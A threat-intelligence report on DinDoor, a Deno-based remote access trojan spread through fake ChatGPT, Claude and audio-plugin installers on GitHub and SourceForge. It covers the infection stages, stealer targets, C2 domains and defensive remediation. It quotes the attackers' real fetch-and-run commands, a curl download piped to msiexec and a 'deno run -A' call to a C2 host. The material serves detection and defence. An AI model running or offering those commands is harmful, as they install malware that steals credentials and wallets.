Threat reportMalwareTL-2026-0590
DinDoor Deno-Based RAT — Fake AI/Audio Software on GitHub & SourceForge (ChatGPT/Claude/AutoTune/Kontakt) via Compromised YouTube Channels
DinDoor Deno-Based RAT (TL-2026-0590), also tracked as DinDoor, is a high-severity malware campaign, first published 2026-05-26. It is attributed to DinDoor Operators (Iran) with medium confidence, affects OpenAI (impersonated) ChatGPT installers, maps to 39 MITRE ATT&CK techniques (T1005, T1027, T1027.013), and is covered by 9 detection rules and 62 indicators of compromise.
- Severity
- HIGHAssessed severity
- CVEs
- 0None referenced
- Techniques
- 39MITRE ATT&CK
- Actors
- 1DinDoor Operators
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 62Indicators of compromise
Key facts for TL-2026-0590
- Threat ID
- TL-2026-0590
- Also known as
- DinDoor, DinDoor Backdoor, DinDoor RAT, Tsundere Botnet (Deno variant)
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution
- DinDoor Operators
- Attribution confidence
- MEDIUM
- Nation-state nexus
- Iran
- Motivation
- FINANCIAL
- Target sectors
- consumer, creative-industries, music-production, gaming, media, education, small-business, government
- Target regions
- North America, Europe, Global
- Detection rules
- 9
- Indicators of compromise
- 62
Malware and tooling in DinDoor Deno-Based RAT
Malware and tooling: CASTLELOADER, ChainShell, Tsundere Botnet - S9034, Deno, DinDoor custom Deno-based RAT framework, Scoop, WinGet
How DinDoor Deno-Based RAT works
DinDoor is a Deno JavaScript runtime-based RAT (Tsundere Botnet variant) distributed through fake installers and plugins impersonating ChatGPT, Claude, AutoTune, Kontakt, ZENOLOGY, Ableton Live, GearUP, and BWR on GitHub and SourceForge, with traffic driven by compromised YouTube channels (50,000+ views). Victims are coached to paste terminal commands that fetch MSI/PowerShell payloads, which abuse Scoop and WinGet to install Deno and execute the RAT — capable of browser and 50+ wallet exfiltration, screen capture, VNC, and a novel peer-to-peer C2 channel that uses hidden Microsoft Edge processes plus WebRTC to stream H.264-encoded screen frames directly to operators. Broadcom and Hunt.io attribute DinDoor to Iran's MuddyWater (Seedworm) APT.
DinDoor is a Deno JavaScript runtime-based remote access trojan first publicly named in March 2026 and tracked as a variant of the Tsundere Botnet (a Node.js-era JavaScript RAT). Broadcom and Hunt.io attribute the malware family to Iran's MuddyWater (Seedworm) APT, while the consumer-facing campaign documented by Malwarebytes ThreatDown on 2026-05-26 may represent a separate operator cluster reusing the same DinDoor toolkit to monetize endpoint access via cryptocurrency and credential theft.
The Malwarebytes-documented campaign delivers DinDoor through fake installers and plugins hosted on GitHub (claude-free-plugin, ai-gen-profi, wharfdemolisherpit) and SourceForge (gearup, bluewaveremover) impersonating ChatGPT, Claude, AutoTune, Kontakt, ZENOLOGY, Ableton Live, GearUP, and BWR. Traffic is funneled from compromised YouTube channels with tutorial videos accumulating over 50,000 views before takedown. Repositories present both Windows and macOS terminal commands that users are instructed to copy and execute — a 'click-to-run-command' / terminal-paste social engineering pattern. A representative Windows command is: 'curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi'.
Stage 1 (package manager abuse): The MSI launches a PowerShell loader (observed names include Juliet_widget15.ps1 and tango_utility84.ps1) dropped to AppData\Local\documents\ and executed via cmd.exe with hidden window, no-profile, and bypass-execution-policy flags. The script ensures both Scoop (alternative Windows package manager) and WinGet (Microsoft Package Manager) are present and installs Deno via 'winget.exe install --id DenoLand.Deno -e --accept-source-agreements --silent'. Deno is downloaded from the legitimate dl.deno.land endpoint to %USERPROFILE%\.deno\bin\deno.exe with no administrative privileges required — a living-off-the-land pattern that bypasses signature-based detection because every binary on disk is signed and legitimate.
Stage 2 (Deno launcher & DinDoor RAT): Deno is invoked as 'deno.exe run -A http://{C2}/{random_path}.js' — the -A flag grants all runtime permissions. An eval-loop construct ('deno run -A --no-check –') fetches subsequent JavaScript stages without disk writes, often using 'data:application/javascript;base64' URIs to keep payloads memory-resident. The launcher binds a TCP listener on a fixed localhost port (10044 or 10091, sample-dependent) and exits if the port is already in use — acting as a single-instance mutex. It then fingerprints the host via a dual rolling hash (constant 0x9E3779B9) over USERNAME, hostname, total RAM, and OS release string, producing a 16-character hexadecimal victim ID attached to every C2 request.
Capabilities and stealer module: DinDoor exposes operator commands 'exec' (shell), 'exec-ps' (PowerShell), 'exec-sc' (service control), 'sysinfo', 'screenshot', and 'stealer'. The stealer targets 50+ cryptocurrency wallet browser extensions (Atomic Wallet, Exodus, Electrum, ByteCoin), Chromium-family and other browsers (Chrome, Chromium, Brave, Edge, Opera, Vivaldi, CentBrowser), messaging clients (Telegram, Discord, Lightcord), clipboard contents (with hijack/modification capability), and selected files via file system enumeration.
Novel P2P C2 via Microsoft Edge: DinDoor's most distinctive capability is a peer-to-peer streaming mode that spawns hidden Microsoft Edge browser processes through the Chrome DevTools Protocol (CDP), injects WebRTC HTML pages into those Edge contexts, captures H.264-encoded screen frames, and streams encrypted peer-to-peer video and control directly to operators via WebSocket-based signaling — bypassing the C2 server for live interactive sessions and severely complicating network-based detection. A custom VNC implementation over WebSocket provides full bidirectional remote desktop control for non-streaming scenarios.
Persistence and C2 infrastructure: Persistence is established via the PowerShell HKCU Run registry key. Beaconing uses HTTP (commonly port 80) and WebSocket against endpoints including /security-pool, /v2{ID}.js, /health, /event, and /mv2/<JWT>/<victim_hash>. Beacon intervals range from 1-second polling (observed) to 30-second intervals (migcredit sample). Infrastructure includes Cloudflare Workers (cf-proxy.cloud-analytics-services.workers.dev) and Caddy reverse proxy chains, identifiable via a distinctive HTTP 'Via: 1.1 Caddy, 1.1 Caddy' response header suggesting at least two proxy hops between internet-facing host and backend application. Hunt.io enumerated 20 active C2 servers concurrently online.
Attribution evidence: The 'Amy Cherne' code-signing certificate found in Installer_v1.21.66.msi has been referenced in research tied to MuddyWater and Russian cybercrime actors operating CastleRAT. Decoded JWT campaign metadata matches MuddyWater operations per JUMPSEC research. CastleLoader (separate loader) shares behavioral overlap and infrastructure with DinDoor (notably the serialmenot.com C2). ChainShell, a Node.js agent observed in the same cluster, shares no code with DinDoor but appears in overlapping infections. Two analyzed samples (migcredit.pdf.msi and Installer_v1.21.66.msi) were built with WiX Toolset on 2026-03-26 and 2026-02-13 respectively, with author metadata 'yankee20' and 'alpha_tool27'.
Why this matters: Deno (and Bun, in the related NWHStealer family) are not commonly profiled by enterprise EDRs, which still focus on Node.js. The runtime is signed, legitimate, and installed via signed package managers, so the malicious payload exists primarily as transient JavaScript fetched into memory — there is no malicious PE on disk after Stage 1 completes. Combined with WebRTC P2P operator channels, this campaign represents a meaningful evasion uplift over conventional RAT delivery and should be treated as a high-priority hunt target by SOCs serving creative, AI-adjacent, and gaming user populations.
MITRE ATT&CK techniques used in TL-2026-0590
Collection
T1005 Data from Local System; T1113 Screen Capture; T1115 Clipboard Data
Defense Evasion
T1027 Obfuscated Files or Information; T1027.013 Obfuscated Files or Information: Encrypted/Encoded File; T1036.005 Match Legitimate Resource Name or Location; T1140 Deobfuscate/Decode Files or Information; T1497.001 Virtualization/Sandbox Evasion: System Checks; T1564.003 Hide Artifacts: Hidden Window; T1620 Reflective Code Loading
Discovery
T1033 System Owner/User Discovery; T1082 System Information Discovery; T1083 File and Directory Discovery; T1518 Software Discovery
Exfiltration
T1041 Exfiltration Over C2 Channel; T1567 Exfiltration Over Web Service
Execution
T1059.001 Command and Scripting Interpreter: PowerShell; T1059.003 Command and Scripting Interpreter: Windows Command Shell; T1059.004 Command and Scripting Interpreter: Unix Shell; T1059.007 Command and Scripting Interpreter: JavaScript; T1204.002 User Execution: Malicious File
Command and Control
T1071.001 Application Layer Protocol: Web Protocols; T1071.005 Publish/Subscribe Protocols; T1090 Proxy; T1095 Non-Application Layer Protocol; T1102.002 Web Service: Bidirectional Communication; T1105 Ingress Tool Transfer; T1572 Protocol Tunneling
Initial Access
T1189 Drive-by Compromise; T1566.002 Phishing: Spearphishing Link
stealth
T1218.007 System Binary Proxy Execution: Msiexec
Persistence
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
defense-impairment
T1553.002 Subvert Trust Controls: Code Signing
Credential Access
T1555 Credentials from Password Stores; T1555.003 Credentials from Password Stores: Credentials from Web Browsers
Resource Development
T1583.001 Acquire Infrastructure: Domains; T1586.001 Compromise Accounts: Social Media Accounts; T1587.001 Develop Capabilities: Malware; T1588.003 Obtain Capabilities: Code Signing Certificates
Affected products and versions in DinDoor Deno-Based RAT
- OpenAI (impersonated) — ChatGPT installers
Vulnerable versions: fake distribution via claude-free-plugin and related GitHub repos - Anthropic (impersonated) — Claude desktop/plugins
Vulnerable versions: fake distribution via claude-free-plugin GitHub repo - Antares (impersonated) — Auto-Tune
Vulnerable versions: fake VST/installer distribution - Native Instruments (impersonated) — Kontakt
Vulnerable versions: fake VST/installer distribution - Roland (impersonated) — ZENOLOGY
Vulnerable versions: fake plugin distribution - Ableton (impersonated) — Ableton Live
Vulnerable versions: fake installer distribution - GearUP (impersonated) — GearUP gaming optimizer
Vulnerable versions: fake installer via sourceforge.net/projects/gearup - Microsoft — Windows
Vulnerable versions: Windows 10; Windows 11 - Apple — macOS
Vulnerable versions: macOS (terminal-paste install path observed in repo READMEs)
Remediation for DinDoor Deno-Based RAT
Immediate actions
- Block listed C2 IPs and domains at the perimeter and DNS layer (claudescript.top, ms-telemetry-gateway-us.com, dakatawebstick.com, ashpaltlonpro.com, agilemast3r.duckdns.org, serialmenot.com, healthydefinitetrunk.com subdomains, hngfbgfbfb.cyou).
- Hunt for deno.exe execution under %USERPROFILE%\.deno\bin\ on endpoints not owned by developers; treat as suspicious by default.
- Hunt for WinGet installs of DenoLand.Deno and Scoop installs of deno on non-developer endpoints.
- Alert on PowerShell child processes of msiexec.exe with hidden-window, no-profile, and bypass-execution-policy flag combinations.
- Block raw.githubusercontent.com downloads in user-context where business need does not exist; alert on curl/Invoke-WebRequest fetching .msi from raw.githubusercontent.com.
- Revoke trust for the 'Amy Cherne' code-signing certificate in enterprise trust stores.
Workarounds
- Where Deno is not a business requirement, block deno.exe execution via AppLocker / WDAC by publisher (DenoLand) or path (%USERPROFILE%\.deno\).
- Disable PowerShell v2 and enable Constrained Language Mode for non-developer users.
- Apply Attack Surface Reduction rule 'Block executable content from email client and webmail' and 'Block all Office applications from creating child processes' (orthogonal but reduces adjacent vectors).
Longer-term hardening
- Deploy EDR with behavioral detection covering JavaScript runtime abuse (Deno, Bun, Node.js) executing arbitrary HTTP-fetched code with -A / --allow-all permission flags.
- Baseline and alert on localhost TCP binds against ports 10044 and 10091 by non-server processes — DinDoor uses these as single-instance mutexes.
- Add detections for Chrome DevTools Protocol activity initiated from non-browser parents and for hidden msedge.exe processes spawned by non-Office, non-shell parents.
- User awareness: terminal-paste attacks (copy command from website / video description into terminal) should be treated as untrusted code execution.
- Restrict installation of package managers (Scoop, WinGet) on non-developer user populations via AppLocker / WDAC.
Weaknesses (CWE) in DinDoor Deno-Based RAT
Timeline of DinDoor Deno-Based RAT
- Installer_v1.21.66.msi compiled with WiX Toolset (build metadata).
- Malwarebytes ThreatDown publishes initial CastleRAT analysis — first public coverage of Deno JavaScript runtime abuse in enterprise attacks, foreshadowing DinDoor family.
- migcredit.pdf.msi compiled with WiX Toolset; sample hash 7b793c54a927da36649eb62b9481d5bcf1e9220035d95bbfb85f44a6cc9541ae.
- DinDoor backdoor publicly named and tracked as a Tsundere Botnet variant.
- Hunt.io publishes deep MSI and C2 analysis enumerating 20 concurrently active DinDoor C2 servers and the Caddy proxy chain fingerprint.
- Rescana and SOCRadar publish reporting attributing DinDoor activity to MuddyWater (Seedworm) targeting U.S. organizations.
- Live malicious repositories observed on GitHub (claude-free-plugin, ai-gen-profi, wharfdemolisherpit) and SourceForge (gearup, bluewaveremover) with click-to-run terminal-paste install instructions for Windows and macOS.
- Malwarebytes ThreatDown discloses fake-software campaign distributing DinDoor via GitHub/SourceForge repos impersonating ChatGPT, Claude, AutoTune, Kontakt, ZENOLOGY, Ableton Live, GearUP, and BWR, driven by compromised YouTube channels with 50,000+ views.
- As of 2026-05-29, DinDoor remains an active threat: Malwarebytes disclosed the fake-AI/audio-software campaign on 2026-05-26 and operators keep rotating GitHub/SourceForge repos as takedowns occur, while Iran's MuddyWater (Seedworm) stays undisrupted with no CVE to patch. The Deno-runtime LOLBin and terminal-paste delivery remain fully viable, so this is live and high-priority.
Sources cited for DinDoor Deno-Based RAT
- Fake software on GitHub and SourceForge distribute Deno RAT
- DinDoor Backdoor: Deno Runtime Abuse and 20 Active C2 Servers
- DinDoor Backdoor Exploits Deno and MSI Installers to Slip Past Detection
- New DinDoor Backdoor Abuses Deno Runtime and MSI Installers to Evade Detection
- Iranian APT MuddyWater Uses Dindoor Malware to Target U.S. Networks
- MuddyWater's Dindoor Backdoor: Iranian APT Targets U.S. Organizations via Deno Runtime and Cloud Storage
- CastleRAT attack first to abuse Deno JavaScript runtime to evade enterprise security
- Analyzing DinDoor, the Deno-Powered Backdoor Disguised as Legitimate Tooling
Detection coverage for TL-2026-0590
As of 2026-05-26, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0590 across Splunk SPL, Microsoft KQL and Sigma, covering 62 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.